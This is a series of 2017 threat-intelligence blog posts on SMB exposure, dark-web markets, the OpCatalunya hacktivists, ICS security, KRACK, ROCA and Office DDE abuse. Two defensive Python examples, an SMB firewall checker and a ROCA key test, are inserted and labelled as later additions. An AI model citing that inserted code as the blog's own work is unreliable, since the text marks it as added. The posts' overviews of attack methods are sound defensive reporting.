    • Proper configuration is also critical. In the case of the SMB service, TCP port 445 should not be reachable from the public Internet; where external access to SMB is required, a VPN or IP address whitelisting should be used to restrict access. SMB traffic should, ideally, not be permitted to egress from an organization’s network to the public Internet.
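One way to turn those SMB configuration points into a repeatable check, as an added example that is not code from the post or from Digital Shadows: a small first-match firewall policy evaluator that confirms TCP 445 is not reachable from public addresses, that every inbound SMB allow rule is scoped to the VPN range, a whitelist or the internal network, and that SMB cannot egress to the Internet. The rule sets and address ranges are constructed; a real run would load the perimeter firewall’s exported policy instead.

```python
"""Added example, not code from the original post or from Digital Shadows.

Policy checker for the SMB hardening guidance: TCP 445 must not be reachable
from the public Internet, external SMB access may only come from the VPN range
or an explicit whitelist, and SMB must not egress to the Internet.  Rules and
address ranges below are constructed (TEST-NET and RFC 1918 space).
"""
from __future__ import annotations

import ipaddress
from dataclasses import dataclass

SMB_PORT = 445


@dataclass(frozen=True)
class Rule:
    direction: str     # "in" (toward the internal network) or "out"
    src: str           # source CIDR
    dst: str           # destination CIDR
    port: int | None   # destination TCP port, None = any port
    action: str        # "allow" or "deny"


def matches(rule: Rule, direction: str, src: str, dst: str, port: int) -> bool:
    """True if a packet (direction, src, dst, port) is covered by the rule."""
    return (
        rule.direction == direction
        and ipaddress.ip_address(src) in ipaddress.ip_network(rule.src)
        and ipaddress.ip_address(dst) in ipaddress.ip_network(rule.dst)
        and rule.port in (None, port)
    )


def decide(rules: list[Rule], direction: str, src: str, dst: str, port: int) -> str:
    """First-match evaluation with an implicit deny, like most perimeter firewalls."""
    for rule in rules:
        if matches(rule, direction, src, dst, port):
            return rule.action
    return "deny"


def audit_smb(rules: list[Rule], internal_net: str, vpn_net: str, whitelist: list[str]) -> list[str]:
    """Return findings; an empty list means the policy follows the SMB guidance."""
    findings = []
    internal = ipaddress.ip_network(internal_net)
    internal_host = str(next(internal.hosts()))           # any representative internal host
    trusted = [ipaddress.ip_network(vpn_net), internal] + [ipaddress.ip_network(w) for w in whitelist]
    public_probes = ["203.0.113.10", "198.51.100.77"]    # constructed public sources (TEST-NET)

    # 1. Can a public address reach SMB on an internal host at all?
    if any(decide(rules, "in", p, internal_host, SMB_PORT) == "allow" for p in public_probes):
        findings.append("TCP 445 on the internal network is reachable from public addresses")

    # 2. Every inbound SMB allow must be scoped to VPN, whitelist or internal space.
    for rule in rules:
        if rule.direction == "in" and rule.action == "allow" and rule.port in (None, SMB_PORT):
            src_net = ipaddress.ip_network(rule.src)
            if not any(src_net.subnet_of(t) for t in trusted):
                findings.append(f"inbound SMB allow from {rule.src} is broader than VPN/whitelist/internal")

    # 3. SMB must not leave the network toward the Internet.
    if decide(rules, "out", internal_host, public_probes[0], SMB_PORT) == "allow":
        findings.append("SMB egress from the internal network to the public Internet is permitted")
    return findings


# Constructed environment.
INTERNAL_NET = "10.0.0.0/16"
VPN_NET = "10.8.0.0/16"
WHITELIST = ["192.0.2.0/24"]   # constructed partner range that legitimately needs SMB

# Weak policy: SMB open to the world, and unrestricted egress.
WEAK_RULES = [
    Rule("in", "0.0.0.0/0", INTERNAL_NET, SMB_PORT, "allow"),
    Rule("out", INTERNAL_NET, "0.0.0.0/0", None, "allow"),
]

# Hardened policy: SMB only from VPN and the whitelist, explicit deny otherwise,
# SMB egress blocked before the general outbound allow.
HARDENED_RULES = [
    Rule("in", VPN_NET, INTERNAL_NET, SMB_PORT, "allow"),
    Rule("in", WHITELIST[0], INTERNAL_NET, SMB_PORT, "allow"),
    Rule("in", "0.0.0.0/0", INTERNAL_NET, SMB_PORT, "deny"),
    Rule("out", INTERNAL_NET, "0.0.0.0/0", SMB_PORT, "deny"),
    Rule("out", INTERNAL_NET, "0.0.0.0/0", None, "allow"),
]

if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(name, audit_smb(rules, INTERNAL_NET, VPN_NET, WHITELIST) or "no findings")
```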

    As long as payment card details and other proprietary information remain lucrative on criminal forums and marketplaces, the travel and hospitality industries need to remain vigilant. But with greater awareness about POS system attacks, operations against third-party suppliers, and the vulnerabilities of public or semi-public Wi-Fi networks, companies can do a lot to mitigate risk and ensure safer journeys for travelers.

    Know Where to Find Your Digital Risk Fri, 10 Nov 2017 22:12:23 +0000 This post originally appeared on SecurityWeek. Read more from CEO Alastair Paterson.

    Approximately 250 years ago Samuel Johnson said, “The next best thing to knowing something, is knowing where to find it.” This is quite a fitting quote from the author of A Dictionary of the English Language and equally fitting today when it comes to understanding your digital risk.

    There’s a great deal of intelligence organizations can find on the deep and dark web. Credit card numbers, bank account information, patient information and intellectual property are widely known to be for sale on forums. Now some of the intelligence is more eye opening. We’re seeing W-2 forms and employee credentials available, making any organization ripe for tax fraud or account takeover, respectively.

    One of the most popular marketplaces on the dark web for such information is AlphaBay. Not only is information related to a company’s assets available, but information about new techniques to compromise targets is for sale as well. One of the latest is a tool to bypass SMS account verification, making multi-factor authentication that relies on SMS vulnerable. On such forums you can also find configuration files for credential stuffing tools, like Sentry MBA, that are created for account takeover of specific companies. There are dozens of marketplaces on the dark web and competition for business is steep. In fact, some less popular marketplaces offer botnets devised to spam AlphaBay users with advertisements or special promotions in an attempt to entice them to switch forums. Not all dark web sources are as readily accessible as AlphaBay, of course. Some require human analyst expertise to also gain access to closed sources to get the most relevant view of the risks.

    But for all the notoriety of these marketplaces, it is also important to remember that criminal activity isn’t limited to the dark web, particularly given the fact that some countries don’t extradite cybercriminals. With minimal consequences, bad actors have no incentive to hide. As a result, cybercrime is an Internet-wide problem, almost equally present on the deep and open web. is a prime example. This all-in-one outsourced online shop provides hosting, design (based on WordPress-like templates) and a payment solution. Additional items for sale on the marketplace include:

    • Bot-registered social media accounts (usually sold in bulk), typically with the intent of supporting social media spam and artificially increasing the popularity of other accounts/posts
    • Stolen, legitimate social media accounts, which are advertised in small quantity but at higher prices compared to bot-registered accounts
    • “Coupons” to services that artificially increase the popularity of social media accounts or posts
    • Stolen accounts from other services including banks, payment, and gift and loyalty cards
    • Dedicated servers and domain names

    The point is that criminal forums exist everywhere so focusing only on the dark web won’t give you a comprehensive view of your digital risk. Furthermore, it isn’t enough to simply detect mentions of company assets and concerns. You need context behind the information you see posted to have a better understanding of the actual risk to your organization. This requires a combination of technology and people.

    • Automated collection technology can provide visibility into incidents with context, as they happen, wherever they happen – across the open, deep and dark web. For example, being able to see previous posts by other users on the marketplace on the same thread or post can provide a deeper understanding of how your company, employees or customers may be impacted. It can also provide an overview of the user in question, with their name, date joined, activity levels and reputation.
    • Data scientists and intelligence experts are able to gain access to some closed sources that collection technology alone can’t penetrate and they need to be involved in qualifying the data collected. With enhanced analytic capabilities and additional context they can help determine the potential impact to the organization, a possible timeline of events, and recommended action.

    A comprehensive assessment of your digital risk starts with knowing where to find it. With an approach that combines technology and human experts looking across the open, deep and dark web, you can understand not only where and when you are mentioned online, but also why, by whom and the likely impact to your organization. This breadth and depth of coverage is essential to protect against threats associated with forums and marketplaces and, ultimately, to formulate a successful digital risk management strategy.

    Pwnage to Catalonia: Five Things We Know About OpCatalunya Thu, 02 Nov 2017 21:00:08 +0000 Since October 24th, Digital Shadows has observed an increase in attack claims and social media activity associated with the OpCatalunya (OpCatalonia) hacktivist campaign. Given the ongoing tensions between Catalonia and Madrid, we expect online activity to continue for the next few weeks at least. Here are five things all organizations with operations in Spain need to know about the campaign:

    1. What is OpCatalunya?

    OpCatalunya was established in late September 2017 by affiliates of the Anonymous collective in response to ongoing political and social tensions between the Catalonian autonomous community and Spain’s Madrid government. Catalonia held an independence referendum on October 1st that was subsequently declared “illegal” by the Spanish government. Although we observed a small number of references to the hashtag OpCatalunya on social media before late September, these were not related to the incumbent hacktivist campaign of the same name and instead pertained to long-running tensions between the region and central government, which dates back to the nineteenth century.

    2. Who is Involved? 

    Although the campaign is most closely associated with the Anonymous collective, particularly its Spanish iteration (Anonymous Spain), other hacktivist actors and groups, including Shadow Sec team, Team Poison, F Security and other branches of the Anonymous collective such as Anonymous France, Anonymous Albania, Anonymous Belgium and Anonymous Germany, have either taken part or pledged their support.

    3. What Activity Have We Seen?

    The campaign initially called for attacks against Madrid-based government and law enforcement websites; however, there has been a widening of targeting to include education, media, and financial services organizations across Spain. As well as several denial of service (DoS) and data leak attacks against Madrid government sites, Anonymous Spain made DoS attack claims against the Spanish royal family’s website and that of Real Madrid Club de Fútbol, the latter due to its historic ties to the royal family and former Francoist regime. Other supporters of the campaign called for attacks against media companies perceived as providing partisan and anti-Catalan reporting, including El Mundo, Marca, El Pais, Pris and Grupo Planeta. Organizations that do not primarily operate out of Madrid have also been targeted; we detected DoS attack claims made against Banca March, a Spanish bank headquartered in Palma de Mallorca. There were also data exposure attacks conducted against websites belonging to the University of Malaga and Federation of Canary Islands, as well as a defacement of the Faculty of Sciences at the University of Cordoba website.

    Given the political and nationalist motives of this campaign, social media activity for OpCatalunya was strongly influenced by developments on the ground. The rise in attack claims in the second half of October 2017 occurred alongside a surge in social media mentions of OpCatalunya and its associated hashtags. Social media mentions grew dramatically following an announcement on October 19th by the Madrid central government that direct rule would be imposed on Catalonia.


    OpCatalunya Twitter activity for Oct 2017

    4. Am I At Risk?

    As targeting for this campaign has expanded beyond government and law enforcement, we assess that all Spanish organizations principally operating out of Madrid are at increased risk of attack. Moreover, OpCatalunya supporters are often opportunistic and not necessarily focused on organizations ostensibly aligned to the central state. Therefore, all organizations with Spanish operations are likely seen as potential targets, though the success of such attacks would often rely on the security posture of these organizations, with attackers typically conducting data exposure attacks and website defacements against low hanging fruit.

    Although very few foreign companies have been targeted thus far, attackers may eventually move towards high-profile internationally recognized targets operating in Spain as a means of further publicizing their cause, particularly given the current impasse over Catalonian independence. The threat to foreign companies would also increase if they were perceived to have close affiliations with Madrid authorities – for example by publicly denouncing the Catalonian right to self-determination, displaying positive sentiment to the actions of central government, or threatening to move business operations out of Barcelona.

    Despite displaying high levels of intent, the capability of OpCatalunya participants is typical of most hacktivist campaigns, primarily consisting of relatively unsophisticated data exposure attacks (likely conducted via SQL injection techniques that are popular among hacktivists), website defacements and DoS attacks. Therefore, the capability of OpCatalunya participants is assessed as low to moderate at the time of writing.

    5. What Else Can We Expect?

    OpCatalonia supporters have explicitly expressed their desire to conduct further attacks, namely a DoS attack against Spanish Internet infrastructure on November 12th. While no further information was provided by the OpCatalonia Twitter account, Internet service providers (ISPs) operating in Spain would be the most probable targets.


    OpCatalonia Twitter announcement

    OpCatalunya has already garnered the support of other participants from the wider Anonymous collective and beyond. We may see additional groups lend their support to the campaign, either out of solidarity for nationalist independence movements or to further their own cause. Forbes published an article on October 16th that claimed the Russian state was actively supporting Catalonian independence to sway public opinion in favor of its annexation of Crimea in 2014, which Russia maintains was a legitimate independence movement from Ukraine. While we detected no indication that Russia or other nation state actors had attempted to influence the Catalonian independence campaign through cyber activity, the prospect of this occurring in future was a realistic possibility.

    Digital Shadows has put in place a dedicated monitoring capability for this campaign. We will update accordingly should there be any significant change in targeting or increase in activity.

    ICS Security: Strawmen In the Power Station Tue, 31 Oct 2017 20:53:56 +0000 Congrats, it is now almost November and we have nearly made it through Cyber Security Awareness month (and what a month it has been). The theme for this final week is: “Protecting Critical Infrastructure from Cyber Threats.”

    For the purposes of this blog, I want to discuss two strawmen views of Industrial Control Systems (ICS) Security which, unfortunately, are both prevalent in many discussions around the topic of critical infrastructure protection:

    1. Doom’n’Gloomers: this is the “sky is falling” view of ICS security, often from people with an IT security background, who are appalled by lack of patches, outdated Operating Systems and lack of traditional IT security controls
    2. Airgappers: this is the view that ICS security is in a good place due to the airgapped nature of ICS systems and the lack of understanding of attackers of the complexities of ICS systems

    My opinion is that both views are partially accurate and that the reality of ICS security is nuanced and appreciation of that nuance is essential for making security decisions about those systems.

    A recent study claims that “One third of OT [Operational Technology] networks are exposed to cyber attacks” mainly due to the ICS systems having some form of internet connectivity, usage of unpatched or unpatchable systems and lack of encryption for passwords. These are all valid concerns. Which strawman argument is right, Doom’n’Gloomers or Airgappers? There are arguments on both sides:

    1. Almost all systems require some degree of internet connectivity in the modern era. While airgaps sound desirable due to their strong security properties, there are serious challenges to their usage: they cannot be updated, the data they collect cannot be exported and they cannot be remotely debugged in case of an issue. In a statement before the Subcommittee on National Security, Homeland Defense, and Foreign Operations in 2011 Sean McGurk, the Director of the Control Systems Security Program, stated that: “In our experience in conducting hundreds of vulnerability assessments in the private sector, in no case have we ever found the operations network, the SCADA system or energy management system separated from the enterprise network.” Despite the absence of complete airgaps, ICS networks are often firewalled or segmented off from the main enterprise network. Frameworks like NIST 800-82r2 and centers like CPNI (Critical Protection of National Infrastructure) have guidance around the deployment of firewalls for ICS systems, for example. We hope this guidance is followed.

    2. The continuing use of Windows XP past its End of Life is a concern, because any newly discovered security vulnerabilities are not being patched. Even though Microsoft issued an emergency patch for the ETERNALBLUE exploit (MS17-010), its deployment in ICS systems is likely not widespread due to the difficulties involved with patching systems where Availability is the key concern. These systems do have vulnerabilities. But the ease of exploitation of these vulnerabilities is not as often discussed. ICS systems often have physical security controls; for example, they may only be accessible from rooms which have physical access control and closed-circuit television (CCTV). Unfortunately, many support contracts do not allow companies to upgrade or modify software without vendor approval, thereby extending the time required to patch.

    3. Legacy equipment which is incapable of encrypting passwords, or the misconfiguration of equipment which is capable, is certainly an issue. However, as mentioned previously, access to control networks is not as straightforward for an attacker as access to the enterprise network. While there are some ICS systems which are connected to the Internet, it is rare to find the Human-Machine Interface (HMI) for a power station easily accessible. Often, they are connected to other systems via leased lines or a VPN. Additionally, the knowledge and skills to compromise an ICS system itself, rather than its surrounding IT infrastructure, are rare. Robert M. Lee and others helpfully distinguish intrusions into ICS systems into two steps: Step One, Network Access, and Step Two, Operation Access. Compromise of the enterprise network would be Step One. Gaining access to the operational networks (Step Two) and then being able to use that access has been publicly documented in only two cases: Stuxnet and BlackEnergy/CRASHOVERRIDE. While such attacks are a concern, they are far from an everyday occurrence.

    One final point which is worth bearing in mind is the level of monitoring of ICS systems that is typically in place. Power stations and other safety-critical systems are monitored closely by operators, and response procedures are also in place. Even in the case of the attack against the Ukrainian power network in December 2015, the power was out for a maximum of 6 hours before the Prykarpattyaoblenergo Company successfully restored power.

    As with many issues in cyber security, we see an evolutionary arms race playing out between attackers and defenders, with each side attempting to gain the upper hand. As for our strawmen, both have their good points; they should remind us of the strengths and weaknesses of ICS systems, together with a cautionary note not to be complacent.

    Extorters Going to Extort: This Time Other Criminals Are the Victims Thu, 26 Oct 2017 15:52:27 +0000

    We are increasingly used to the tactic of extorting a company through the threat actor publicly releasing data. The recent HBO extortion attempt is a prime example, and actors like thedarkoverlord have also used this approach to a large extent. Digital Shadows has tracked well over 20 thedarkoverlord extortion attempts since June 2016. The process is straightforward enough: acquire a company’s valuable data, threaten to release the data if a ransom is not paid, and then put pressure on the victim by sharing the data with journalists. But cybercriminals also face this risk themselves. In this case, a criminal marketplace is the victim of an extortion attempt. Is there any trust left in criminal marketplaces?

    Fig 1 – An advertisement for basetools on another criminal forum


    On October 24th, a user posted on Pastebin claiming to have accessed customer details and administrator accounts of Basetools, an online criminal marketplace. The user also claimed to have obtained personal details of the administrator and demanded $50,000 in ransom, or he would release further information and the dox of the administrator. The post threatened to inform law enforcement should the payment not be made. At the time of writing, the Basetools market was “under update” and claimed it would be back in “a few days”.

    Fig 2 – The message received when accessing Basetools on 25 October 2017


    Basetools is a criminal marketplace that is often advertised within Russian-speaking criminal forums and marketplaces. The site allows vendors and buyers to trade credit card information, customer accounts, and spamming tools. The site claims to offer over 150,000 accounts, 20,000 tools and 24/7 support.

    Fig 3 – A screenshot provided by the extortionist, claiming to show access to the admin support panel

    One motivation behind the threat is clearly financial, but that does not tell the entire story. The actor claims that the administrator of the site has been manipulating the vendors, creating false personas and falsely elevating those vendor profiles to the top of listings.


    What’s the Impact?

    For many years, the criminal marketplace – whether that is on the dark or deep web – has been the preserve of cybercriminals, allowing them to easily advertise and sell their illicit goods. However, this has experienced a significant shift in the past 4 months with the demise of AlphaBay and Hansa marketplaces.

    We have previously forecast the potential shift from centralized marketplaces to more decentralized models and the conditions that would have to exist for this to become a reality. The attempted extortion of Basetools, and in particular the allegations of an admin manipulating vendor ratings, is yet another reason for cybercriminals to reconsider the idea of a centralized market. In a decentralized model, the risk of this occurring would be reduced.

    While the conditions for a decentralized model taking the lead may not yet be there, this may take us one step further. In future posts, we’ll be looking at the recent adoption of the decentralized model and the implications of it.

    Women in Security: Where We Are And Where We Need To Go Wed, 25 Oct 2017 15:34:27 +0000 Ada Lovelace, Grace Hopper, Katherine Johnson, Radia Perlman—some of history’s greatest technical minds have been women. However, since the mid-1980s, there has been a devastating decline in the number of female computer science and engineering graduates. This is even more clearly reflected in the modern workforce—especially within Information Security.

    Source: Pixabay

    While women make up nearly half of the American and European workforces and 40 percent of the workforce worldwide, according to the ISC2 2017 Women in Cybersecurity report, only 11 percent of global Information Security professionals are women. Many women also have difficulty moving up in their careers, despite reporting higher education levels and qualifications than their male counterparts. Furthermore, at all levels, men earn more than women, are nine times more likely to be promoted to managerial roles, and four times as likely to hold C-level positions.

    Source: Center for Cyber Safety and Education


    So, why aren’t there more women in security and what’s keeping those of us who are from excelling? While there is no single answer, part of this can be traced back to a trend that became prominent in 80s pop culture, when computers became labeled as something only ‘nerdy’ guys should enjoy—think Revenge of the Nerds, or the more modern-day IT Crowd—where male leads are portrayed as socially awkward and computer-obsessed.

    Source: Pinterest

    In addition, personal computers became a household norm. According to an NPR article entitled “When Women Stopped Coding,” this trend was seen in many more homes with male children than in those with female children. Therefore, the sheer lack of exposure to computers, again, diverted a lot of young women away from an interest in tech. Many more boys grew up with the opportunity to excel in coding, security, and other computer-related disciplines, not only from an early age, but from home—setting a nearly impossible bar for young women to reach.

    As far as the workforce is concerned, tech has quite an unfortunate retention rate for women as well, as many women end up switching careers after some time in a technical role. Personally, before I even took my first security course in undergrad, I was warned by another woman in the field that I would need “a very thick skin” to succeed. She was absolutely correct and this is something I learned quickly on my own, as well. This is not okay and it should absolutely not be the standard.

    Furthermore, according to the ISC2 report, 51 percent of women have experienced discrimination within the field, with only 15 percent of men reporting the same. According to these reports, this also happens even more frequently as women excel in their careers. In addition, while unemployment rates in tech are lower than many other fields, according to Dice, for women it’s the opposite. And with other issues such as pay inequity and gender discrimination, women face a very steep uphill battle if they truly want a future in this field.



    In modern day Silicon Valley, a few women have been willing to speak out against these injustices. Women like Ellen Pao, famous for her gender discrimination lawsuit, and Susan Fowler, for her blog on the toxic working culture for women in tech. However, despite this, little has changed.

    Back to security, with the big push for women to learn how to code at female-focused coding camps like Hackbright and Girls Who Code, the number of female software developers is on the rise. In fact, according to the US Bureau of Labor Statistics, 20 percent of software/web developers are female. However, this same push is not reflected in security, as the aforementioned statistic of only 11 percent of InfoSec professionals being women shows. This also rings true at events and meetups focused on women in tech. Other women have looked at me strangely and become a bit cliquey in these situations, once I’ve shared that I work in security and not software development. Because of this, women in security can still feel left out, even in a room full of female tech professionals.

    This is very problematic because of the increasing demand for workers with cybersecurity skills. A major lack of women in the field therefore results in fewer people to fill these much-needed positions. On top of that, women should be encouraging other women in tech, regardless of their specific discipline.

    According to a study from the “Center for Cyber Safety and Education”, there is a projected gap of 1.8 million unfilled cybersecurity jobs by 2022. A push for women to enter the security workforce would not only aid in closing this, but businesses with a more even distribution of men and women have seen up to a 41 percent increase in revenue. And companies with at least three female directors have seen over a 66 percent increase in invested capital. Workplaces with more gender diversity also see higher customer satisfaction, productivity, and profitability.



    So, how do we change this? I think the first thing that needs to be considered is a strong outreach to young girls. This is not only critical, but needs to begin very early at the elementary level. According to a survey conducted by Microsoft, girls lose interest in STEM when they hit their early teenage years. In addition, 60 percent of them report that they are intimidated by the tech field because of the unequal numbers and stereotypes.

    1. Get engaged at a young age – and stay engaged. It’s important to inspire girls at a young age with hands-on workshops, camps, and other experiences. While coding camps are fantastic, a rise in security camps needs to happen, as well. We need to encourage our young girls who are excited about logic and problem solving to recognize how they can one day make a career out of it. And finally, it needs to be fun. We need to inspire young girls to excel in tech in the same way we do with young boys. The Girl Scouts of America, with their superstar rocket scientist CEO, have teamed up with Palo Alto Networks, and are making strides in the right direction. In 2018, the Girl Scouts will begin offering a range of cybersecurity badges. Hopefully other organizations will begin to follow this example.

    Source: Pixabay

    2. Powerful role models. Another change that needs to happen, is for girls to become less intimidated by the industry itself. Personally, I was always interested in tech, but also terrified by the idea of entering such a male-dominated field. This is enough to dissuade many women from even giving it a chance. A focus on powerful female role models within tech and security is paramount. I’d love to see more lists like this:

    Source: Pixabay

    3. Keep up progress where it exists. On a positive note, according to the ISC2 report, millennials may have a chance to change this downward trend due to an increased number of women entering computer science and engineering degree programs. This increase is likely due to the focus on technology, which has occurred within our lifetime. In fact, just last year, more women graduated with engineering degrees than men at Dartmouth, and several other universities are working to follow suit. Last year, the Oracle Academy also pledged $3M and began the international Let Girls Learn initiative with the White House in order to help expose more young girls to STEM.


    Encouragement early on is key, as girls lose interest in tech at a very young age. Inspiring them to embrace their abilities and to recognize the opportunities at hand is an excellent start. Work needs to be put in by people across many industries—whether it’s security, education, or community organizations—in order to become a driving force to not only embrace women within the field, but to close a very serious, impending employment gap within it, as well. Negative stereotypes about tech need to become a thing of the past, and positive female role models need to be lifted up and exemplified. Without any of this, the cybersecurity industry is going to continue to lack diversity, and soon flounder, as demand increases but our standards continue to live in the past.

    Trust vs Access: A Tale of Two Vulnerability Classes Fri, 20 Oct 2017 15:32:55 +0000 It’s been a big week in cyberspace, with high profile crypto vulnerabilities KRACK (affecting WPA2) and ROCA (affecting RSA keys generated by Infineon hardware) hitting the news. Not only were these mammoth bugs disclosed, but a new Adobe Flash 0-day exploit was observed in the wild being used to install the FinSpy commercial malware, and finally, the DDE feature in Microsoft Office was found to be open to abuse to gain code execution. There has been a great deal of discussion on Twitter and elsewhere on the comparative severity of the different vulnerabilities and, in particular, how the crypto bugs were not as severe as initially thought.



    I think the vulnerabilities are all interesting in their own way and it’s helpful to delineate the differences between them. Both crypto bugs represent an attack on trust; that is, they undermine the trust that people and organizations have in security systems to protect them. WPA2 is used almost exclusively to secure WiFi networks around the globe and the consequences of a loss of trust in the protocol are severe. Many organizations will launch vast programs to ensure that they’re protected, equipment will be ripped and replaced and countless meetings will be held on the topic, even though the risk, as it stands today, is low (only limited proof-of-concept code is available and Microsoft Windows is relatively unaffected). In addition, requiring physical proximity to the target network also raises the bar to a successful attack. The perception, however, is that WPA2 is imperiled.

    Figure 1 – KRACK attack logo

    A similar story exists for the ROCA vulnerability. Infineon products are used in many different types of cryptographic equipment: software signing, Trusted Platform Modules (TPM), identity documents, certain authentication tokens, etc. For each RSA key of 1024 or 2048 bit length generated by a piece of hardware, it must first be established whether a vulnerable Infineon chip was used to generate the key; secondly, one of the various tools must be used to verify that the key is not easily factorized due to the key generation vulnerability. Due to the prevalence of the vulnerable chips and the diversity of the equipment they are used in, this verification process will be costly both in terms of money and time.

    Figure 2 – ROCA impact diagram
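As an added illustration of the verification step described above (example code written for this page, not Digital Shadows’ code nor the ROCA authors’ detection tool), the following check implements the published ROCA fingerprint test: affected keys have primes of the form k*M + (65537^a mod M), so for every small prime r dividing M the modulus N mod r must lie in the subgroup generated by 65537. The sample moduli are constructed to exhibit (or not exhibit) that structure and are not real keys.

```python
# Added example: structural (fingerprint) test for ROCA-style RSA moduli.
# Primes generated by the affected library look like p = k*M + (65537^a mod M),
# with M the product of the first few odd primes. Hence N = p*q satisfies
# N mod r in <65537 mod r> for each small prime r | M. A random modulus fails
# at least one of these residue checks with overwhelming probability, so the
# test has a negligible false-positive rate while never needing to factor N.

# First 38 odd primes (3..167); 2 is skipped because RSA moduli are odd.
SMALL_PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59,
                61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127,
                131, 137, 139, 149, 151, 157, 163, 167]
GENERATOR = 65537


def _subgroup(r, g=GENERATOR):
    """All residues g^k mod r, i.e. the cyclic subgroup generated by g mod r."""
    seen = set()
    x = 1
    while x not in seen:
        seen.add(x)
        x = (x * g) % r
    return seen


# Precomputed per-prime allowed residue sets (the "fingerprint").
FINGERPRINTS = {r: _subgroup(r) for r in SMALL_PRIMES}


def failing_primes(n):
    """Small primes r for which n mod r is outside <65537 mod r>."""
    return [r for r in SMALL_PRIMES if n % r not in FINGERPRINTS[r]]


def roca_fingerprint(n):
    """True when n matches the ROCA key structure at every small prime.

    A True result means the key should be treated as weak and replaced;
    a False result rules the structure out at that prime and is conclusive.
    """
    return not failing_primes(n)


def constructed_structured_modulus():
    """Constructed positive sample: p and q follow the affected form.

    Only the residue pattern matters for the fingerprint, so p and q are not
    checked for primality here; this is not a usable RSA key.
    """
    m = 1
    for r in SMALL_PRIMES:
        m *= r
    p = 3 * m + pow(GENERATOR, 17, m)
    q = 5 * m + pow(GENERATOR, 23, m)
    return p * q


def constructed_random_modulus():
    """Constructed negative sample: its residue mod 11 is 2, which is outside
    the subgroup {1, 10} generated by 65537 mod 11 (65537 = -1 mod 11)."""
    return 11 * 10**600 + 2


if __name__ == "__main__":
    for label, n in (("structured", constructed_structured_modulus()),
                     ("random-like", constructed_random_modulus())):
        verdict = "WEAK (ROCA structure)" if roca_fingerprint(n) else "ok"
        print(f"{label}: {verdict}; first failing primes: {failing_primes(n)[:3]}")
```

Only the modulus is needed, so the same check can be run over exported public keys or certificates by extracting N before calling roca_fingerprint.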


    This week Kaspersky Lab released a report on the usage of an Adobe Flash 0-day against Middle Eastern targets by the BlackOasis APT actor. The detection of the exploit resulted in Adobe issuing an out-of-band critical patch and the Chrome browser blocking the usage of vulnerable versions of Flash. The exploit was part of an attack that delivered the FinSpy commercial malware to selected targets, most likely for espionage purposes. While this attack demonstrates once again the validity of Adobe’s decision to retire Flash in 2020 and the importance of removing Flash entirely or enforcing click-to-play and mandatory patching, now that this attack has been burned the immediate danger has passed for many users. Anti-virus definitions have been updated, patches issued and many, but obviously not all, endpoints are now protected against this attack. The real danger of such exploits is that, once they’ve been found in the wild, they often find their way into exploit kits and other attack toolkits which are used to exploit unpatched systems.

    Figure 3 – Adobe security update for CVE-2017-11292

    The final big news story was the discovery by SensePost of a method of gaining remote code execution from Microsoft Office documents by abusing a legacy feature called DDE. In a method similar to VBA macros or OLE embedded objects in Microsoft Office, the DDE technique does not require exploitation of a vulnerability, but rather rests on a user clicking through a confusing prompt which permits the attacker’s payload to be executed. While SensePost contacted Microsoft concerning the issue, it was deemed that the DDE feature was working as expected and would not be immediately patched. Numerous attacks have already been observed in the wild using this technique and, so far, many defenders are struggling to keep attackers using this approach out of their networks.

    Figure 4 – Prompt separating the user from system compromise

    The crypto attacks KRACK and ROCA are very different in their impact compared to the Adobe Flash 0-day and the Microsoft Office DDE issue. The crypto attacks are attacks on trust. Organizations deploying WPA2 and RSA-based encryption have to rely on the supply chain providers performing their due diligence on the products that they provide. This applies particularly to the ROCA attack, where the full extent of the issue is still unknown. More and more products are being discovered as generating vulnerable keys and we can expect that we will be having to check for weak keys for a long time to come.

    The Flash 0-day and the DDE issue are ways for attackers to gain initial access to a network. Mitigations exist in terms of patching or disabling features, and once they have been dealt with, an organization can have a reasonable amount of confidence that it is resilient against attacks using these particular vectors. However, the uncertainty spread by attacks which undermine the systems we use for protection is more insidious: the trust we have in these systems turns out to have been misplaced.

    When assessing the impact of a vulnerability, it is worth keeping in mind what the consequences of the vulnerability are:

    • Is it a tool for providing unauthorized access to an attacker?
    • Or is it undermining the trust we have in the security systems we have built?

    In terms of response, if unauthorized access to our networks is discovered, the response can be tactical and immediate, that is, a standard incident response. The response to an attack on trust must be more long-term and strategic. It must take into account the uncertainty around the lifetime and impact of the issue; these attacks on trust may live on for years in the most unexpected places.

    Key Reinstallation Attacks (KRACK): The Impact So Far Mon, 16 Oct 2017 15:02:12 +0000 Today, a series of high-severity vulnerabilities affecting the WiFi Protected Access II (WPA2) protocol were disclosed. Security researchers have developed a proof of concept (POC) demonstration, dubbed “KRACK”, and a dedicated website through which further details are likely to be released.

    An advisory was distributed by the US CERT to a select number of unidentified organizations stating the following malicious activities could occur should an attacker successfully exploit the vulnerabilities: decryption, packet relay, TCP connection hijacking, and HTTP content injection attacks.

    Here’s what we know – and do not yet know – so far.



    It’s likely that a large number of devices which use WiFi are exposed to this vulnerability, but an attack only works if the attacker is within range of the victim’s network. In other words, an attack requires the physical presence of the attacker near the victim’s network.



    Fig 1 – A screenshot of a POC demonstration for KRACK. Source: hxxps://www[.]youtube[.]com/watch?time_continue=13&v=Oh4WURZoR98


    Researchers have demonstrated a proof of concept (POC) attack, dubbed “Krack attack”, targeting an Android smartphone; the video showed how all the data transmitted by the victim could be decrypted. The video also showed a plaintext downgrade attack against TLS/SSL via sslstrip. Details of this are available on a dedicated website: hxxps://www[.]krackattacks[.]com/. Linux and Android versions 6.0 and above are particularly affected, though the list of vulnerable devices is extensive.

    Some wireless manufacturers have already developed patches to mitigate against this threat, with Bleeping Computer and US CERT having published useful lists of the latest firmware and driver updates.



    While there is a proof of concept demonstration, there was no proof of concept code released, and no public indication these vulnerabilities had been exploited in the wild. Although the POC video gave a good overview of the exploit, the exact technical knowledge required to successfully conduct this type of attack is unknown.

    We have not yet observed the vulnerability exploited in the wild, although criminals have shown an interest. This is confirmed by conversations on criminal forums, with users interested – yet skeptical – in finding a quick exploit.


    Fig 2 – Discussion of KRACK on a criminal forum


    The US CERT reiterates that the vulnerabilities could potentially be used to conduct arbitrary packet decryption and injection, TCP connection hijacking, HTTP content injection, or the replay of unicast, broadcast, and multicast frames by conducting a man-in-the-middle (MiTM) style attack. Of course, not all devices are equally affected, but the research paper outlines these differences.

    In order to manage the risk, here are five steps organizations can take:

